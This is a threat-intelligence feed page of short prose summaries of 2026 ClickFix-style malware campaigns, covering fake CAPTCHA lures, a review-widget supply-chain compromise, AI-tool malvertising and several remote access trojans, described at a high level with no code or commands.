Threats Tagged 'clickfix'

This is a sophisticated phishing campaign known as the evolution of "ClickFix" that uses social engineering and victim-assisted execution to bypass endpoint security. Attackers send emails with urgent OneDrive document lures containing malicious ZIP attachments. The attack employs LNK shortcuts redirecting victims to landing pages that silently inject PowerShell commands into the clipboard. Victims are tricked into manually executing these commands via Win+R, circumventing traditional security filters. The campaign uses DNS TXT records for payload staging to avoid HTTP detection and includes multiple malicious components such as obfuscated scripts, fake MSI installers masquerading as legitimate software, and spyware-laden ISO images for persistent access. This campaign represents a shift toward long-term post-compromise control of the environment.

On May 14, 2026, a supply chain attack was discovered targeting the Okendo Reviews widget, a customer review platform used by over 18,000 brands. The threat actor injected malicious JavaScript code into the legitimate widget, which is deployed on high-traffic e-commerce pages including storefronts and product pages. The compromised JavaScript acted as a staged loader, using obfuscation, localStorage tracking, User-Agent filtering, and XOR-based decoding to conceal next-stage infrastructure. The attack employed ClickFix-style social engineering to deceive users into executing malicious commands, ultimately delivering remote access trojans like NetSupport and Remcos, or information stealers such as StealC. Affected websites received hundreds of thousands to millions of monthly visitors, with nearly 15,000 blocks recorded in a single day.

Cybercriminals orchestrated a sophisticated malvertising operation leveraging Google Ads to impersonate popular AI developer tools including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains. Over seven weeks spanning April to June 2026, attackers deployed 106 unique malicious hostnames across six distinct waves, initially hosting ClickFix social engineering pages on GitLab infrastructure before pivoting to weaponize claude.ai's legitimate shared chat feature. The campaign targeted technically proficient users searching for AI development tools, tricking them into executing terminal commands that deployed the MacSync infostealer. This credential-harvesting malware collected browser data, SSH keys, and cryptocurrency wallets. The Asia-Pacific region sustained the heaviest impact with 67.2% of over 2,000 victims, particularly concentrated in Taiwan. Anthropic responded by banning malicious accounts and implementing additional abuse mitigations.

MediumMalwareBritish Indian Ocean TerritoryFranceHong Kong+6#gitlab pages abuse#macsync#ai impersonation

This analysis covers infostealer distribution trends observed during May 2026, based on automated collection systems and diagnostic logs. Distribution occurred primarily through illegal software disguised as cracks and keygens, as well as email campaigns. ACRStealer, Remus, and LummaC2 were most prevalent, with distribution via domains including Mediafire and AWS S3 buckets. Microsoft was the most impersonated company, followed by Auslogics and NVIDIA. EXE files represented 78.9% of execution types, while DLL side-loading accounted for 21.1%. macOS environments saw ClickFix techniques and malicious Bash scripts, with 142 scripts and 12 C2 domains identified. Email campaigns distributed AgentTesla and DarkCloud. Remus showed significant growth, comprising 36% of distributions. LummaC2 remained the most prevalent overall variant.

In March 2026, threat actors leveraged AI-powered website builders to create typosquatting domains impersonating a Brazilian bank. The campaign employed ClickFix techniques, presenting victims with fake CAPTCHA and BSOD screens to trick them into executing malicious PowerShell commands. This delivered SmartRAT, a PowerShell-based banking trojan with capabilities including encrypted C2 communications, remote control of screen/keyboard/mouse, credential theft through keylogging and banking overlays, and QR code interception for transaction fraud. The malware establishes persistence via scheduled tasks and Windows services, and targets Brazilian financial institutions, payment platforms, and cryptocurrency exchanges. The threat actors' C2 panel contained critical authentication flaws allowing client-side bypass, suggesting deployment without adequate security review.

MediumMalwareBrazil#banana rat#fake captcha#smartrat

A ClickFix social engineering attack on an unmonitored endpoint led to a multi-stage intrusion affecting over 11 hosts. The infection chain began with a malicious HTA payload that silently installed an MSI package containing Potemkin, a custom loader with a deterministic DGA. Potemkin delivered RMMProject, a 4.4 MB Lua-scriptable RAT featuring browser credential theft with Chrome App-Bound Encryption bypass, hidden-desktop remote control, and 15 distinct task types. The attacker deployed EtherRAT, a Node.js backdoor resolving C2 addresses from Ethereum blockchain, and established a Cloudflare tunnel for persistent access. Hands-on-keyboard activity included battling Windows Defender through AMSI patches, registry modifications, and service termination, followed by lateral movement via WMIExec and SMBExec to deploy malware across the network and reach the domain controller.

SilabRAT is an advanced Remote Access Trojan offered as Malware-as-a-Service on Darkweb forums since late 2025, developed by threat actor o1oo1 and sold for $5,000 monthly. This financially-motivated tool focuses on credential theft and cryptocurrency operations, featuring Hidden Virtual Network Computing for invisible remote control, browser profile cloning to bypass session protections, and automated cryptocurrency wallet password cracking. The RAT bypasses Chrome App-Bound Encryption, performs session hijacking, and includes keylogging, clipboard monitoring, and remote desktop capabilities. Distributed through phishing and ClickFix campaigns with operator-hosted infrastructure, SilabRAT uses ChaCha20-Poly1305 encryption for command-and-control communications. The developer also offers AsmCrypt, a companion crypter service, creating a complete malware bundle from evasion to execution and remote control.

A sophisticated phishing campaign exploits Amazon's brand reputation through spoofed security alerts to deliver HarborWatch Agent, a custom remote access trojan. The attack chain begins with emails impersonating Amazon security notifications about suspicious account activity, directing victims to lookalike domains. Users are presented with fake CAPTCHA verification pages that employ ClickFix social engineering techniques, instructing them to execute PowerShell commands on their own systems. The multi-stage infection downloads mysql.exe from compromised infrastructure, which communicates with a Chinese-language command and control panel branded Harbor Sentinel. The RAT collects extensive system information including OS details, architecture, CPU count, disk usage, memory status, and network configurations, exfiltrating data through API endpoints to the threat actor's monitoring infrastructure.

In May 2026, a new malware family named MLTBackdoor was identified, likely leveraged by ransomware-related threat actors to establish footholds for lateral movement. Delivered through multi-stage ClickFix infection chains targeting automotive-related web pages, this backdoor employs sophisticated obfuscation techniques including Mixed Boolean-Arithmetic and Control Flow Flattening. MLTBackdoor features indirect system calls, API hashing, and extensive anti-analysis checks that detect debuggers and sandboxed environments. Its capabilities include filesystem operations and a powerful Beacon Object File loader that dynamically expands functionality. The malware uses custom encrypted binary protocols over TLS with Elliptic-Curve Diffie-Hellman key exchange for command-and-control communications. Additionally, it implements a deterministic date-based Domain Generation Algorithm to maintain persistence when hardcoded C2 domains become unreachable, demonstrating advanced resilience against takedown attempts.

A multi-stage phishing campaign emerged in early May 2026, impersonating LinkedIn and Indeed through typosquatted domains to deliver malicious payloads. The attack chain begins with fake CAPTCHA pages distributed via Google Ads, leveraging the legacy Finger protocol and native Windows utilities. Victims are tricked into executing commands that deploy portable Python runtimes (CPython or IronPython), which then execute in-memory shellcode. The campaign delivers CastleLoader, a Malware-as-a-Service framework using ChaCha20 and RC4 encryption for C2 communications, followed by a Python-based remote access trojan. The RAT provides interactive shell control, in-memory payload execution, and persistence mechanisms. The campaign represents an evolution of browser-based social engineering, combining Living-off-the-Land binaries with Python-based delivery to maintain a fileless footprint and evade detection through legitimate system utilities.